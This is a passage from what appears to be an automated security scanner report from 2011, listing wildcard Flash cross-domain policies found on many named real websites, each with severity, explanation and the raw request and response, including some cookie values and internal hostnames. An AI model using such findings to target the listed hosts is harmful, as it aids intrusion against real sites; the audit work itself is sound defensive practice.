...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.43. http://img-cdn.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img-cdn.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img-cdn.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Content-Type: text/x-cross-domain-policy
Date: Thu, 05 May 2011 00:59:59 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.44. http://img.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:30 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1b1f-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.45. http://lifestream.aol.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://lifestream.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: lifestream.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:27 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2592000
Expires: Sat, 04 Jun 2011 00:58:27 GMT
Content-Type: text/html
Content-Length: 169
Keep-Alive: timeout=5, max=61
Connection: Keep-Alive

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.46. http://log30.doubleverify.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 05 May 2011 01:01:12 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.47. http://metrics.apple.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.apple.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:43:29 GMT
Server: Omniture DC/2.0.0
xserver: www126
Content-Length: 93
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

6.48. http://mobile.aol.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mobile.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:26 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 202
Keep-Alive: timeout=5, max=999871
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

6.49. http://o.sa.aol.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.sa.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: o.sa.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:26 GMT
Server: Omniture DC/2.0.0
xserver: www48
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.50. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Fri, 06 May 2011 00:57:27 GMT
Content-Type: text/xml
Content-Length: 207
Date: Thu, 05 May 2011 00:57:27 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.51. http://portal.pf.aol.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://portal.pf.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: portal.pf.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:45 GMT
Server: Apache
Last-Modified: Wed, 16 Jun 2010 22:15:39 GMT
ETag: "c6-4892d0fd518c0"
Accept-Ranges: bytes
Content-Length: 198
Keep-Alive: timeout=5, max=954
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.52. http://puma.vizu.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://puma.vizu.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: puma.vizu.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:45:36 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n7.panthercdn.com
ETag: "9c515-10d-5c70b100"
P3P: CP="DSP NID OTP UNR STP NON", policyref="/w3c/p3p.xml"
Cache-Control: max-age=604800
Expires: Wed, 11 May 2011 07:28:29 GMT
Age: 65827
Content-Length: 269
Content-Type: text/xml
Last-Modified: Fri, 15 Apr 2011 19:51:00 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-
...[SNIP]...

6.53. http://r.unicornmedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.unicornmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.unicornmedia.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 26 Oct 2010 13:18:54 GMT
Accept-Ranges: bytes
ETag: "0736b561075cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 05 May 2011 10:51:12 GMT
Connection: close
Content-Length: 218

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cr
...[SNIP]...

6.54. http://r1-ads.ace.advertising.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r1-ads.ace.advertising.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:53:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 10:53:52 GMT
Content-Type: text/xml
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.55. http://s.gravatar.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Thu, 05 May 2011 00:59:30 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: nginx
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.56. http://s3.cinesport.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s3.cinesport.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s3.cinesport.com

Response

HTTP/1.1 200 OK
x-amz-id-2: vKKd+i/tBK9yQ68lO8U8Y1JeWGUEuVoDdsEaoVjqzdhUlKeU7akoKVLr3eUL2/sL
x-amz-request-id: 4B7E3A998B2B0464
Date: Thu, 05 May 2011 00:57:39 GMT
x-amz-meta-s3fox-filesize: 204
x-amz-meta-s3fox-modifiedtime: 1254865363318
Last-Modified: Tue, 06 Oct 2009 21:49:18 GMT
ETag: "199ac761aefc6dd785276dfea364b271"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 204
Connection: keep-alive
Server: AmazonS3

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

6.57. http://search.twitter.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:54:05 GMT
Server: hi
Last-Modified: Tue, 25 Jan 2011 18:03:36 GMT
Cache-Control: max-age=1800
Expires: Thu, 05 May 2011 11:24:05 GMT
Content-Type: application/xml
Content-Length: 206
Vary: Accept-Encoding
X-Varnish: 1922777360
Age: 0
Via: 1.1 varnish
X-Cache-Svr: smf1-aaq-15-sr1.prod.twitter.com
X-Cache: MISS
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.58. http://secure-us.imrworldwide.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:41 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Thu, 12 May 2011 00:57:41 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

6.59. http://segment-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 05 May 2011 01:00:40 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

6.60. http://speed.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Thu, 05 May 2011 00:56:56 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

6.61. http://sportingnews.122.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sportingnews.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:44 GMT
Server: Omniture DC/2.0.0
xserver: www411
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.62. http://sportsillustrated.cnn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sportsillustrated.cnn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: sportsillustrated.cnn.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:35 GMT
Server: Apache
Last-Modified: Mon, 25 Oct 2010 17:53:44 GMT
Accept-Ranges: bytes
Content-Length: 759
Content-Type: application/xml
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*.si.com" />
   <allow-access-from domain="*.si-apps.com" />
   <allow-access-from domain="*.cnn.com" />
   <allow-access-from domain="*.cnn.net" />
   <allow-access-from domain="*.doubleclick.net" />
   <allow-access-from domain="*.turner.com" />
   <allow-access-from domain="*.secondthought.com" />
   <allow-access-from domain="*.2mdn.net" />
   <allow-access-from domain="*.wsj.com" />
   <allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.atdmt.com"/>
   <allow-access-from domain="*.doubleclick.net" secure="true"/>
   <allow-access-from domain="*.fwmrm.net"/>
   <allow-access-from domain="*" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...

6.63. http://t.mookie1.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.mookie1.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:16 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 12 Apr 2011 21:52:25 GMT
ETag: "5d240b9-c9-4a0bfb522d840"
Accept-Ranges: bytes
Content-Length: 201
Keep-Alive: timeout=15, max=3
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.64. http://tcr.tynt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tcr.tynt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tcr.tynt.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1800
Content-Type: text/xml
Date: Thu, 05 May 2011 00:57:28 GMT
ETag: "251523935"
Expires: Thu, 05 May 2011 01:27:28 GMT
Last-Modified: Tue, 10 Nov 2009 16:25:33 GMT
Server: EOS (lax001/54D7)
X-Cache: HIT
Content-Length: 201
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.65. http://www.aolcdn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aolcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aolcdn.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 13 Feb 2009 16:24:41 GMT
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: text/xml
Date: Thu, 05 May 2011 00:58:56 GMT
Content-Length: 421
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSche
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.66. http://www.everydayhealth.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.everydayhealth.com

Response

HTTP/1.1 200 OK
Content-Length: 369
Content-Type: text/xml
Last-Modified: Fri, 22 Apr 2011 15:55:46 GMT
Accept-Ranges: bytes
ETag: "02df0bd51cc1:3644"
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
Date: Thu, 05 May 2011 10:56:31 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!--used for flash slideshows -->
<cross-domain-policy>
   <site-control permi
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.67. http://www.huffingtonpost.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.huffingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix)
Last-Modified: Thu, 01 Jul 2010 13:55:20 GMT
ETag: "13598ce-fd-48a53d22e2200"
Content-Type: application/xml
Date: Thu, 05 May 2011 00:58:42 GMT
Content-Length: 253
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*" /><allow-http-request-headers
...[SNIP]...

6.68. http://www.mapquest.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mapquest.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="nZG12c16OqjJIk32ss/xe+wwpew="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:04 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:04 GMT; Path=/
Set-Cookie: psession="ul5Rtcgv+4mAPbUgz5v+xO8fVFE="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:04 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:04 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"209-1304454924000"
Last-Modified: Tue, 03 May 2011 20:35:24 GMT
Content-Type: application/xml
Content-Length: 209
Date: Thu, 05 May 2011 00:57:04 GMT
Connection: keep-alive

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" secure="false"/></cross-domain
...[SNIP]...

6.69. http://xml.truveo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://xml.truveo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: xml.truveo.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:31 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 20:08:41 GMT
ETag: "1294019-104-4a264b4d30440"
Accept-Ranges: bytes
Content-Length: 260
Keep-Alive: timeout=15, max=65
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
    <site-control perm
...[SNIP]...

6.70. http://abcnews.go.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://abcnews.go.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: abcnews.go.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60000
Connection: close
Date: Thu, 05 May 2011 10:52:10 GMT
Content-Type: text/xml
Last-Modified: Fri, 16 Oct 2009 20:19:08 GMT
Accept-Ranges: bytes
ETag: "0463aea9d4eca1:19df0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc04
X-Powered-By: ASP.NET
Set-Cookie: SWID=B58ECB92-659D-4546-8224-C624993FAF71; path=/; expires=Thu, 05-May-2031 10:52:10 GMT; domain=.go.com;
Cache-Expires: Thu, 05 May 2011 10:52:53 GMT
Content-Length: 1333
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.go.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.dig.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.abcnews.com" secure="false" />
...[SNIP]...
<allow-access-from domain="a.abcnews.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a.abcnews.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.abc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.tequila.com" />
<allow-access-from domain="*.theplatform.com" secure="true" />
...[SNIP]...
<allow-access-from domain="localhost:7002" secure="false" />
...[SNIP]...
<allow-access-from domain="10.192.34.*" secure="false" />
...[SNIP]...
<allow-access-from domain="qlvabcweb01.corp.dig.com" secure="false" />
...[SNIP]...
<allow-access-from domain="d.yimg.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="clearspring.com" />
<allow-access-from domain="widgets.clearspring.com" />
<allow-access-from domain="*.clearspring.com" />
...[SNIP]...

6.71. http://about.aol.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://about.aol.com
Path:   /crossdomain.xml

Issue detail

